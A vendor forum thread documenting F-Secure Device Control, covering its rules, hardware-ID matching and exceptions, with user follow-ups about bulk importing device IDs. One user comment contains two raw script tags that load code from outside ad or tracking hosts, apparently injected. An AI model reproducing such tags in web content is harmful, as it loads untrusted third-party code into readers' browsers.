Device Control Overview

PatrickPatrick Posts: 130
edited April 28 in Business Security

 Device Control allows to an network administrator to protect network by disallowing to use some hardware devices (USB sticks, CD-ROM drives, web-cameras and so on).

When prohibited device is plugged in - the Device Control turns it off to prevent user access.

 Device Control is provided with Client Security 9.3x

 Installing Device Control

Device Control is installed by default with Client Security 9.30. Default rules doesn't disallow any devices. To use the function the Device Control have to be configured from the Policy Manager.

Device Control configuration

Device Control can be configured from the Policy Manager only. There are no local configuration user interface.


Device control options

OptionValuesDescription
Device Control Enabled
  • Enabled,
  • Disabled
Allow to disable Device Control. All rules and options will be ignored if this option has "Disabled" value
Notify Administrator
  • No Alerts,
  • Informational,
  • Warning,
  • Security
Specifies the type of alert that is sent when a device is blocked. The administrator will receive the corresponding type of alert. For example, if 'Warning' is selected, the administrator will receive a warning alert. If 'No Alerts' is selected, the administrator will not receive any alerts for blocked devices.
Hardware Devices   This table contains the rules for device control. The most specific rule will be used to determine the access level for a device. Devices can be identified by (from specific to general):
  1. Device ID,
  2. Hardware ID,
  3. Compatible ID
  4. Device Class GUID.
    All devices not listed in this table are allowed by default.


Hardware Devices table

ColumnValuesDescription
Active
  • Yes
  • No
This flag indicates that the rule is in use
Display Name   The rule name that is shown to administrators. This name should help administrators to organize rules.
Hardware ID   The string that identifies the device (Device ID, Hardware ID, Compatible ID or Class GUID).
Access Level
  • Full access
  • Blocked
The access level for the device.

 

How Device Control block devices

Hardware Identifiers

In Windows every device have a few sets of properties that can be used to identify the device or the class of device.
In the table below the properties are ordered by specificity from most specific to general:

PropertyDescription
Device ID A device has only one device ID that is the most specific ID for a device.
Hardware IDs Device can have multiple hardware IDs. They are also ordered by specificity.
Compatible IDs List of general IDs for all devices of the same kind.
Class A single GUID of device interface class. Every device has one and only one class. This is a registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class where device information are stored. There are list of common classes but some devices generates unique class.

 

The algorithm

  1. Device Control subscribes to the system notification about hardware configuration changes.
  2. When configuration changed Device Control enumerates all devices.
  3. For every device device identifiers checked starting from Device ID down to Class GUID.
  4. If matching rule found Device Control check the Access Level from the rule.
  5. If rule has Full access and device is blocked - Device Control remove block (enable the device).
  6. If rule has Blocked access level and device id not blocked - Device Control blocks (disable) the device.
  7. If access level match the current state of the device then no action is performed.

Alerts

  • When device is blocked for the first time - flyer notification is shown to the current user.
  • Policy manager administrator gets the alert every time when device is blocked. 


Block access using predefined rules

Device Control is provided with the set of common rules:

  • USB Mass Storage Devices
  • Wireless devices
    NOTE: Some USB Wi-Fi adapters doesn't use the USB\Class_E0 hardware id. To control such devices one should create a custom rule.
  • DVD/CD-ROM drives
  • Windows CE ActiveSync devices
  • Floppy drives
  • Modems
  • COM & LPT ports
    NOTE: This rule control not a device connected too the COM or LPT port but ports itself.
  • Printers
  • Smart Card Readers
  • Imaging Devices (cameras and scanners)
  • IEEE 1394 Host Bus Controllers
  • IrDA Devices
  • Bluetooth Devices

To prevent users from use devices administrator should select "Blocked" access level for desired rule.

 

Adding exceptions (grant access to the specific device)

It is possible to define rules that allows to use some specific device when all other devices of same class will be blocked:

  1. Get Hardware ID of device that should be allowed. The Hardware ID have to be more specific that ID used to block the device.
  2. Add new rule in Hardware Devices table with the ID.
  3. Set "Full access" access level for the new created rule.
  4. Set Active "Yes" for the new created rule.

    Getting Hardware ID for device

    There are several ways to get Hardware IDs of device to use it in rules:

    1. Using Device Control statistics
    2. Using Windows Device Manager

      Getting Hardware ID from statistics

      1. Open Device Control statistic in the Policy Manager.
      2. Find an interesting device in Devices table that should be used inrules
      3. Use one of values from Hardware IDs, Compatible IDs or Device Class columns

        Getting Hardware ID from Windows Device Manager

        1. From Control Panel open Device Manager
        2. Select an interesting device in the tree
        3. Open properties dialog
        4. Go to Details tab
        5. There are following properties with IDs:
          1. Hardware IDs
          2. Compatible IDs
          3. Device class guid

         

        Device Control statistics

        Device control reports about all devices installed on the PC using PM statistics. Device Control Statistics contains following table:

        ColumnDescription
        Device ID The device ID
        Device Name The name of device reported by system
        Hardware IDs The comma-separated list of Hardware IDs
        Compatible IDs The comma-separated list of Compatible IDs
        Device class The Device class guid
        State The sate of device reported by Windows:
        • Enabled - device can be used
        • Disabled - device can't be used
        • Unknown - the system can't get device state. Probably there are some problem with device driver
        Rule If device was disabled by Device Control this field will contain Hardware Id from rule affected rule

        Comments

        • tletle Posts: 16

          Is F-Secure going to provide some kind of tool for adding (import) multiple DeviceIDs to PM?

        • PatrickPatrick Posts: 130

          Hi tle,

           

          I will check out on this with R&D and come back to you afterwards.

        • PatrickPatrick Posts: 130

          Hi tle,

           

          R&D took this feature request to their backlog. We are currently collecting feedback on Device Control and we will decide later on, which feature we will implement and when we are going to implement those.

           

          Therefore I can't tell you if and when we will implement your request.

        • johan65johan65 Posts: 20

          Hi dear Patric!

           

           

          I agree. Smiley Wink It would be very convenient if, for example, there is a monitor tool within client wish have the purpose to read all devices, have it reported to Policy Manager and use a similar management mechanism as we use for reported applications from clients.

        • PatrickPatrick Posts: 130

          Hi Johan,

           

          we basically have the functionallity to view the Hardware ID's from client usind Device Control Statistics:

           

          Getting Hardware ID from statistics

          1. Open Device Control statistic in the Policy Manager.
          2. Find an interesting device in Devices table that should be used inrules
          3. Use one of values from Hardware IDs, Compatible IDs or Device Class columns

          But as mentioned before we do not offer a solution to directly create rules based on those in the statistics. I will inform R&D that there is more demand for such feature.

           

          Thanks for your reply!

        • tletle Posts: 16

          Any progress on the tool to get multiple DeviceIDs imported for example from a .csv file?

           

           

        • keioozkeiooz Posts: 41

          Hi there. image

           

          Do we have any update on this?

        • tletle Posts: 16

          So, is F-Secure going to make any kind of tool for importing?!

        • I've installed F-Secure Policy Manager 10.01 and F-Secure Client Security 9.32 for the clients. But I'm not finding any option for Device Control. Can you please tell me how to configure my device control from the policy manager.

           

          Julker

          <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
        • PatrickPatrick Posts: 130

          Hi Julker,

           

          the device control settings are only available in "advanced mode" view of Policy Manager Console. Once switched to advanced mode you'll find "F-Secure Device Control" among the different modules.

        • tletle Posts: 16

          Is there still no tool for adding multiple device-ids to PM?

        • kallstromkallstrom Posts: 25

          @Patrick wrote:
            Adding exceptions (grant access to the specific device)

          It is possible to define rules that allows to use some specific device when all other devices of same class will be blocked:

          1. Get Hardware ID of device that should be allowed. The Hardware ID have to be more specific that ID used to block the device.
          2. Add new rule in Hardware Devices table with the ID.
          3. Set "Full access" access level for the new created rule.
          4. Set Active "Yes" for the new created rule.

           

          Hi

          Can U take a look on my settings and tell me what is wrong that my exception doesn't work

           

          FDC

           

          DataTravel3 has Full access but it's blocked by the first rule. I want to block all the usb mass devices except those I will choose not to.

          thx

        • VadVad Posts: 1,050 F-Secure Employee

          Hello kallstrom,

           

          Please, try to use "Hardware Ids" property value from Device Manager.

          Example: USB\VID_0457&PID0151

          or: USB\VID_0457&PID0151&REV_0100

           

          Best regards,

          Vad

        • kallstromkallstrom Posts: 25

          Hello Vad,

           

          thx, I used the IDs U have mentioned and it's ok now

          at f-secure console its called Device ID - first column

        • kallstromkallstrom Posts: 25

          is it possible to copy the whole list of devices from one Policy Manager to another?

        • VadVad Posts: 1,050 F-Secure Employee

          Unfortunately, there is no such functionality in Policy Manager.

        • kallstromkallstrom Posts: 25

          Do U plan to create a tool or import/export option for this module? My office has 5 branches, each has separate PMC. So i need to enter 1000 devices in each console :/

        • VadVad Posts: 1,050 F-Secure Employee

          Sorry for incorrect information. The feature is implemented already in PM 11 (or even earlier). You need to select the rows (or whole table)  and by right click of the mouse you'll get the possibility to "Export table to CSV" and "Import table form CSV".

           

          Best regards,

          Vad

        This discussion has been closed.